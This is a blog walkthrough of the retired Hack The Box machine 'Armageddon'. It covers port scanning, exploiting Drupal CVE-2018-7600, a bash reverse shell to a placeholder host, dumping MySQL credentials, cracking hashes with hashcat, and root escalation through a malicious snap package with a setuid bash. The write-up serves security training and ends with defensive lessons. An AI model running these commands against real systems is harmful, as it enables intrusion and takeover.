Hack The Box — Armageddon Write-up
This is my 2nd blog and a step towards OSCP Journey…
“Armageddon” is a retired box from HackTheBox(14/200)
Lets start pwning it ❗️
As we step in the box the first thing that we do is to use Linux built-in tool nmap to scan the ports of this machine.
nmap -sC -sV 10.10.10.233 -o nmap.txt
- -sC: run all the default scripts related to the specific port
- -sV: detect the version of the service used
- -o: to output the result
Scanning the ports we found that port 80 is running Apache based website so lets check the website.Another thing ,we can see is that ssh running on port 22.
While enumerating we went through view-source and saw that Drupal CMS is running and nmap also gave the same information.Going through what Drupal is ,we found out the structure of Drupal that is available publicly on the internet.
Our nmap shows robots.txt file available so lets check that out.
Look Look!! 😜
what we’ve found here, “CHANGELOG.txt” file that may disclose some information about drupal, so lets check that out.
Here we found the version Drupal is running that is Drupal 7.56. Our next step is definitely to find exploit for this version so ,
LETS GOOGLE!! 😃
Here we’ve found the exploit: Drupal 7 (CVE-2018–7600 / SA-CORE-2018–002)
Now we are going to git-clone the exploit and use it.
python3 drupa7-CVE-2018-7600.py http://10.10.10.233 --command='whoami'
This returned the privilege information of the current user that is “apache”,So this means that out exploit is working and we can execute a command to get shell.
For that we have to create a bash-shell using PayloadAllTheThings and put it in the index.html file after that we will upload and execute it over the victim’s machine.
bash -c 'bash -i >& /dev/tcp/LHOST/LPORT 0>&1'
- -c : overrides the rest of the command line from that point on
- -i : this flag is used for interaction
Now we will use three terminals T1,T2 and T3.
- T1: Terminal is for running the exploit that will execute the curl and bash command to get and run index.html file respectively.
- T2 : Terminal is listening for the shell on port 443
nc -lvnp 443
- T3 : Terminal opens webserver on port 80 to transfer index.html file
python -m SimpleHTTPServer 80
As soon as the index.html file is curled and bashed we got our reverse shell. Now our next step is to enumerate further and escalate privileges.
We have already gathered the information that Drupal has MySQL database setup with it by default and now we have to look for the configuration file that stores username and password for MySQL. After googling it found out to be stored in
/sites/default/settings.php ,So lets check settings.php
Checking through settings.php we found database’s username & password.
Our next step is to interact with MySQL database and retrieve username and hashed password.
Interacting with MySQL database
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -e 'show databases'
- -u: username
- - -password: password
- -e: to execute further commands
Here is the list that MySQL returned and we can see here “drupal” as database, So we will enumerate further to see tables inside drupal-database.
mysql -u drupaluser --password=CQHEy@9M*m23gBVj -D drupal -e 'show tables'
The user table is important for us out of all the tables in the database.Here we will further enumerate users table to see its field and then get whats hiding behind those fields.
"describe users" execution command will give us fields.
These are the four fields that are important for us, So we will only select these fields from the user table.
"SELECT uid,name,pass and login FROM users" executing command Lets see what we retrieve after this command.
Ok now we got the user credential of this machine and the hashed password, so our next step is to know the hash and crack it using hashcat but before that we need to know what type of hash is it.
Knowing the type and cracking hash
hashcat --example-hash | less
then find the hash using its initial characters in the search option type
Now we will crack the password as we know the mode : 7900, we save our hash in the file called hashes and then run hashcat
hashcat -m 7900 hashes -w /usr/share/wordlists/rockyou.txt
Yayy❗we’ve cracked the hash and the credential becomes:-
Exceeding Privilege Escalation
Our next step is to login in the machine as this user using ssh that’s running on port 22.
Notice!! we have captured 🏁 user flag.
To step up our privilege escalation, we need admin authority and to do that we will look what commands this user can perform using :-
- sudo: stands for superuser.
- -l: flag lists the superuser command that normal user can execute.
O my! O my! look what we’ve found here, we can eventually install packages using snap which is a package manager software.So here what we are thinking is to create a malicious snap package and then install it using this command. Before that we will create a normal snap package using GTFOBins on our machine and then install in on victims machine.
Creating simple .snap package
These are the commands that need to be run on our machine to create normal snap package name “xxxx_1.0_all.snap” that will only return users information when installed on attackers machine.
Here we can see there are two terminals, the top one is used to get the snap package that is just created and saved it as safe.snap and the bottom terminal is used to start a server to get snap package uploaded from our machine.
Now we will install this package according to the GTFOBins command and see what happens
This means if we insert malicious command into the snap package it will run as root so our next step is to run bash shell using root. But for that we need to see where the bash is located, then we will paste that bash into our current directory and then we will use root to run the bash shell.
Lets find our bash shell and paste in the current directory.
We found the bash it has roots access and we copied it to our current directory and now we have to create a malicious command to run this bash when install the snap package.
Creating a malicious .snap package
We will make use of chown command to give access to ‘brucetherealadmin’ user to run bash as root.
chown root:root /home/brucetherealadmin/bash;chmod 7455 /home/brucetherealadmin/bash
As our malicious snap is ready so we will repeat the same steps to install this package on the machine and see what happens next.
We went through same previous steps and now if we notice it returned us
status 1 and bash file got red which means its dangerous if we execute it and will give us root access. To run bash we need to use the command:-
Notice!! we have captured 🚩root flag.
- Never leave web applications outdated, always keep an eye on them and update them regularly as they might give a shell to the attacker.
- Do not put default files
/sites/default/settings.phpas they can be easily accessed by an attacker if he gets a lead.
- Snap packages should not be given privileges to a user to install a package,as malicious packages if installed can escalate attackers authority.
— — — — — — — — — —KHTAM — — — — — — — — — —